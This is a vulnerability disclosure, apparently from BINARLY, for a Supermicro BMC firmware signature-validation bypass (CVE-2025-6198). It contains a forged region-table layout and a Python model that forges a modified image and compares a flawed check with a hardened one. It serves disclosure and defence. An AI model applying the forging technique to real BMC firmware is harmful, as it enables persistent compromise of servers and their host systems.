Supermicro BMC firmware update validation bypass
The BINARLY team has discovered a vulnerability in the Supermicro BMC firmware authentication design that allows an attacker to update the system firmware with a specially crafted image.
Potential Impact
An attacker could trick the BMC administrator into updating the BMC with a custom image containing malicious content. This would result in complete compromise of the BMC, which in turn provides access to the main host OS. It would also let the attacker persist across BMC reboots and move laterally within the compromised infrastructure, infecting other endpoints.
Vulnerability Information
- BINARLY internal vulnerability identifier: BRLY-2025-021
- Supermicro PSIRT assigned CVE identifier: CVE-2025-6198
- CVSS v3.1: 7.2 High (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Affected Supermicro firmware
| Device | Version | SHA256 |
|---|---|---|
| X13SEM-F | 01.03.47 | bc859f2c4858ae51165b25fb8dfae6d7862e8515a921e7f7bdb9b66443a44501 |
Vulnerability description
The auth_bmc_sig function parses the sig_table section of the uploaded BMC firmware, which describes the signed regions of the image:
- offset 0x0000000, size 0x0100000: bootloader
- offset 0x0100000, size 0x0001000: sig_table
- offset 0x0110000, size 0x0010000: pdb_seca
- offset 0x0130000, size 0x03e9e00: kernel
- offset 0x0630000, size 0x2000000: rootFS (1st part)
- offset 0x2630000, size 0x064a080: rootFS (2nd part)
The firmware validation process computes the SHA-512 digest over these regions and compares it with the RSA-4096-signed digest value placed in the firmware image. Because the regions that feed the digest are defined by the uploaded image itself (in its sig_table), an attacker can modify parts of the firmware (for example, the kernel), move the original bytes of the modified range into unused space in the image, and rewrite the sig_table so that the hashed regions still produce the original signed digest. The signature check therefore passes for the modified image.
For example, it is possible to modify 0x200 bytes of the kernel region at offset 0x1c5600, store the displaced original bytes in unused space, and then rewrite sig_table with the following entries:
- offset 0x0000000, size 0x0100000: bootloader
- offset 0x0101000, size 0x0001000: sig_table (original, relocated)
- offset 0x0110000, size 0x0010000: pdb_seca
- offset 0x0130000, size 0x0095600: kernel (before the custom content)
- offset 0x0102000, size 0x0000200: kernel (original data that was replaced with custom content, relocated)
- offset 0x01c5800, size 0x0354600: kernel (after the custom content)
- offset 0x0630000, size 0x2000000: rootFS (1st part)
- offset 0x2630000, size 0x064a080: rootFS (2nd part)
We validated this technique on a device: the modified image was accepted and the customized Linux kernel executed during boot, which effectively bypasses the BMC RoT (Root of Trust) feature.
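The following model reproduces the relocation trick described above and contrasts it with a fixed-layout check. It is an added example, not BINARLY's or Supermicro's code: the sig_table encoding (u32 entry count followed by u32 offset/size pairs) is an assumption, since the advisory does not document the real format, the image contents are constructed pseudo-random bytes, and the RSA-4096 step is reduced to a trusted SHA-512 value that the signature is taken to carry.

```python
import hashlib
import random
import struct

# Region layout of the signed image as listed in the advisory: (offset, size, name).
# The sig_table at 0x100000 is itself one of the hashed regions.
ORIGINAL_LAYOUT = [
    (0x0000000, 0x0100000, "bootloader"),
    (0x0100000, 0x0001000, "sig_table"),
    (0x0110000, 0x0010000, "pdb_seca"),
    (0x0130000, 0x03e9e00, "kernel"),
    (0x0630000, 0x2000000, "rootFS (1st part)"),
    (0x2630000, 0x064a080, "rootFS (2nd part)"),
]
SIG_TABLE_OFF, SIG_TABLE_SIZE = 0x100000, 0x1000
KERNEL_OFF, KERNEL_SIZE = 0x130000, 0x3e9e00
IMAGE_SIZE = 0x2630000 + 0x064a080

# Hypothetical sig_table encoding (assumption; the real Supermicro format is not in the
# advisory): u32 entry count, then (u32 offset, u32 size) pairs, zero-padded to 0x1000.
def encode_sig_table(entries):
    blob = struct.pack("<I", len(entries))
    for off, size, _name in entries:
        blob += struct.pack("<II", off, size)
    return blob.ljust(SIG_TABLE_SIZE, b"\0")

def decode_sig_table(blob):
    (count,) = struct.unpack_from("<I", blob, 0)
    return [struct.unpack_from("<II", blob, 4 + 8 * i) + ("",) for i in range(count)]

def digest_over(image, entries):
    """SHA-512 over the concatenation of the listed regions, in table order."""
    h = hashlib.sha512()
    for off, size, _name in entries:
        h.update(image[off:off + size])
    return h.digest()

def build_vendor_image(seed=1):
    """Constructed stand-in for a vendor image: deterministic pseudo-random region
    contents plus the encoded sig_table at its fixed offset. Gaps stay zero-filled."""
    rng = random.Random(seed)
    image = bytearray(IMAGE_SIZE)
    for off, size, name in ORIGINAL_LAYOUT:
        if name != "sig_table":
            image[off:off + size] = rng.getrandbits(size * 8).to_bytes(size, "little")
    image[SIG_TABLE_OFF:SIG_TABLE_OFF + SIG_TABLE_SIZE] = encode_sig_table(ORIGINAL_LAYOUT)
    return image

def vulnerable_verify(image, trusted_digest):
    """Flawed check modelled on auth_bmc_sig: the hashed regions are read from the
    uploaded image's own sig_table. trusted_digest stands in for the SHA-512 value
    carried by the RSA-4096 signature; the RSA step itself is not modelled."""
    table = decode_sig_table(image[SIG_TABLE_OFF:SIG_TABLE_OFF + SIG_TABLE_SIZE])
    return digest_over(image, table) == trusted_digest

def hardened_verify(image, trusted_digest):
    """Fix: the region layout is fixed in the verifier, so the signature binds a fixed
    byte layout and the image cannot redirect which bytes get hashed."""
    return digest_over(image, ORIGINAL_LAYOUT) == trusted_digest

PATCH_OFF, PATCH_LEN = 0x1c5600, 0x200   # kernel range modified in the advisory
ORIG_TABLE_COPY = 0x101000               # unused space between sig_table and pdb_seca
ORIG_KERNEL_COPY = 0x102000

def forge_image(vendor, payload):
    """Relocation trick from the advisory: overwrite PATCH_LEN kernel bytes, park the
    displaced originals and the original sig_table in unused space, and point a new
    sig_table at them so the hashed byte stream is unchanged."""
    forged = bytearray(vendor)
    forged[ORIG_TABLE_COPY:ORIG_TABLE_COPY + SIG_TABLE_SIZE] = vendor[SIG_TABLE_OFF:SIG_TABLE_OFF + SIG_TABLE_SIZE]
    forged[ORIG_KERNEL_COPY:ORIG_KERNEL_COPY + PATCH_LEN] = vendor[PATCH_OFF:PATCH_OFF + PATCH_LEN]
    forged[PATCH_OFF:PATCH_OFF + PATCH_LEN] = payload
    after_off = PATCH_OFF + PATCH_LEN
    forged_layout = [
        (0x0000000, 0x0100000, "bootloader"),
        (ORIG_TABLE_COPY, SIG_TABLE_SIZE, "sig_table (original, relocated)"),
        (0x0110000, 0x0010000, "pdb_seca"),
        (KERNEL_OFF, PATCH_OFF - KERNEL_OFF, "kernel (before payload)"),              # 0x95600
        (ORIG_KERNEL_COPY, PATCH_LEN, "kernel (displaced original bytes)"),
        (after_off, KERNEL_OFF + KERNEL_SIZE - after_off, "kernel (after payload)"),  # 0x354600
        (0x0630000, 0x2000000, "rootFS (1st part)"),
        (0x2630000, 0x064a080, "rootFS (2nd part)"),
    ]
    forged[SIG_TABLE_OFF:SIG_TABLE_OFF + SIG_TABLE_SIZE] = encode_sig_table(forged_layout)
    return forged

def demo():
    vendor = build_vendor_image()
    trusted = digest_over(vendor, ORIGINAL_LAYOUT)     # the value the vendor signed
    payload = b"\xcc" * PATCH_LEN                      # constructed attacker bytes
    forged = forge_image(vendor, payload)
    return {
        "vendor_vulnerable": vulnerable_verify(vendor, trusted),
        "vendor_hardened": hardened_verify(vendor, trusted),
        "forged_vulnerable": vulnerable_verify(forged, trusted),   # True: bypass
        "forged_hardened": hardened_verify(forged, trusted),       # False: rejected
        "payload_in_kernel": bytes(forged[PATCH_OFF:PATCH_OFF + PATCH_LEN]) == payload,
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The forged table reproduces the advisory's sizes (0x95600 before the payload, 0x354600 after it), and the byte stream fed to SHA-512 is identical to the original, so the attacker-chosen bytes at 0x1c5600 never enter the digest. The hardened variant rejects the forged image because both the kernel range and the table location at 0x100000 now differ from what was signed; any design in which the image chooses what gets hashed fails the same way.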
Note: it is also possible to downgrade the BMC firmware. For example, with the latest firmware installed, a firmware image with version 01.02.06 is accepted and flashed.
Note: X13SEM-F firmware version 01.04.15 (SHA256: b9039a551ea31fc2590567e8d1aa3ed55dcf74a3f7694921af9e4eb2b5997064), released after this issue was reported to the Supermicro PSIRT, is also vulnerable.
Disclosure timeline
This bug is subject to a 90-day disclosure deadline. After 90 days have elapsed or a patch has been made broadly available (whichever is earlier), the bug report becomes visible to the public.
| Disclosure Activity | Date (YYYY-mm-dd) |
|---|---|
| Supermicro PSIRT is notified | 2025-05-29 |
| Supermicro PSIRT confirmed reported issue | 2025-06-21 |
| Supermicro PSIRT assigned CVE number | 2025-06-21 |
| Supermicro PSIRT public disclosure date | 2025-09-17 |
| BINARLY public disclosure date | 2025-09-18 |
Acknowledgements